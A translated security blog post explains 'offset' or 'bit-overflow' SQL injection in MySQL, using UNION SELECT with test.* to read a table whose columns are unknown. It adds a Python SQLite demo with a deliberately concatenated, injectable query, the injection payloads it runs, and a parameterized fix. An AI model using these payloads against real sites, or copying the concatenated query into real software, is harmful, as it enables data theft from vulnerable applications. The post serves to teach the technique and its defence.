Today I saw an article on FreeBuf about "bit-overflow injection" (位溢注入); personally I feel it is not much different from offset injection (偏移注入).
Offset injection applies when:
- The column names of the target table cannot be guessed, but a basic id column can be assumed to exist
- The injectable table currently in the query has more columns than the target table
The two tables used in the experiment: the injectable user table
+------+------+----------+-------+-------+---------+---------+------+
| id | user | pass | birth | phone | country | city | time |
+------+------+----------+-------+-------+---------+---------+------+
| 1 | user | userpass | 1999 | 13177 | cn | beijing | 9 |
+------+------+----------+-------+-------+---------+---------+------+
1 row in set (0.00 sec)
The target test table
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | test | test |
+----+----------+----------+
Assume here that, apart from id, the columns of test are highly random, unguessable names. Because UNION SELECT only requires the two halves to have the same number of columns, and test.* expands to all three of test's columns, the following statements can be executed:
mysql> select * from user union select 1,2,3,4,5,test.* from test;
+------+------+----------+-------+-------+---------+---------+------+
| id | user | pass | birth | phone | country | city | time |
+------+------+----------+-------+-------+---------+---------+------+
| 1 | user | userpass | 1999 | 13177 | cn | beijing | 9 |
| 1 | 2 | 3 | 4 | 5 | 1 | test | test |
+------+------+----------+-------+-------+---------+---------+------+
2 rows in set (0.00 sec)
mysql> select * from user union select 1,2,3,4,test.*,8 from test;
+------+------+----------+-------+-------+---------+---------+------+
| id | user | pass | birth | phone | country | city | time |
+------+------+----------+-------+-------+---------+---------+------+
| 1 | user | userpass | 1999 | 13177 | cn | beijing | 9 |
| 1 | 2 | 3 | 4 | 1 | test | test | 8 |
+------+------+----------+-------+-------+---------+---------+------+
mysql> select * from user union select 1,2,test.*,test.* from test;
+------+------+----------+-------+-------+---------+---------+------+
| id | user | pass | birth | phone | country | city | time |
+------+------+----------+-------+-------+---------+---------+------+
| 1 | user | userpass | 1999 | 13177 | cn | beijing | 9 |
| 1 | 2 | 1 | test | test | 1 | test | test |
+------+------+----------+-------+-------+---------+---------+------+
2 rows in set (0.00 sec)
"Shifting" here means moving the contents of test.* progressively forward through the column list until they land in the columns the page actually echoes back. Seen this way, this is not much different from offset injection under Access; all that is missing is the trailing JOIN of the two tables.
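To make the mechanism concrete, here is an added example (not from the original post) that rebuilds the two tables in an in-memory SQLite database and shows why the UNION only cares about the total column count, what happens when the counts do not match, and why a bound parameter stops the input from ever reaching the statement text. The functions vulnerable_lookup, safe_lookup, column_count and run_union are constructed for this demo; SQLite is used in place of MySQL because it ships with Python.

```python
import sqlite3

# Constructed in-memory copies of the post's two tables: user has 8 columns,
# test has 3. The row values are the ones shown in the post's mysql output.
SCHEMA = """
CREATE TABLE user (id INTEGER, user TEXT, pass TEXT, birth TEXT,
                   phone TEXT, country TEXT, city TEXT, time TEXT);
INSERT INTO user VALUES (1, 'user', 'userpass', '1999', '13177', 'cn', 'beijing', '9');
CREATE TABLE test (id INTEGER, username TEXT, password TEXT);
INSERT INTO test VALUES (1, 'test', 'test');
"""


def fresh_db():
    """Return a new in-memory SQLite database loaded with the two demo tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, city):
    """Hypothetical vulnerable query: the city value is concatenated straight
    into the SQL text, so a quote can close the literal and append a UNION."""
    sql = "SELECT * FROM user WHERE city = '" + city + "'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, city):
    """The same lookup with a bound parameter: the input is only ever a value,
    so a UNION inside it is compared against the city column, not executed."""
    return conn.execute("SELECT * FROM user WHERE city = ?", (city,)).fetchall()


def column_count(conn, table):
    """How many columns `table.*` expands to. This is the only thing the UNION
    checks: the sum of literals plus test.* columns must equal the left side."""
    cur = conn.execute("SELECT * FROM " + table + " LIMIT 0")
    return len(cur.description)


def run_union(conn, payload):
    """Run the concatenated statement; return the result rows, or the engine's
    error text when the two halves of the UNION have different column counts."""
    try:
        return vulnerable_lookup(conn, payload)
    except sqlite3.OperationalError as exc:
        return str(exc)


if __name__ == "__main__":
    db = fresh_db()
    print("user columns:", column_count(db, "user"), "test columns:", column_count(db, "test"))
    # test.* occupies the last three positions (post's first statement).
    print(run_union(db, "beijing' UNION SELECT 1,2,3,4,5,test.* FROM test-- "))
    # test.* shifted forward and repeated (post's third statement).
    print(run_union(db, "beijing' UNION SELECT 1,2,test.*,test.* FROM test-- "))
    # 3 literals + 3 columns = 6, not 8: the UNION is rejected.
    print(run_union(db, "beijing' UNION SELECT 1,2,3,test.* FROM test-- "))
    # Same payload through a bound parameter: no rows, nothing executed.
    print(safe_lookup(db, "beijing' UNION SELECT 1,2,3,4,5,test.* FROM test-- "))
```

The payloads end in "-- " (comment marker followed by a space) so that the trailing quote the application appends is swallowed in both SQLite and MySQL; MySQL requires the whitespace after "--" for it to count as a comment. The fix shown in safe_lookup is the only one that matters here: once the value is bound rather than concatenated, column-count tricks have nothing to attach to.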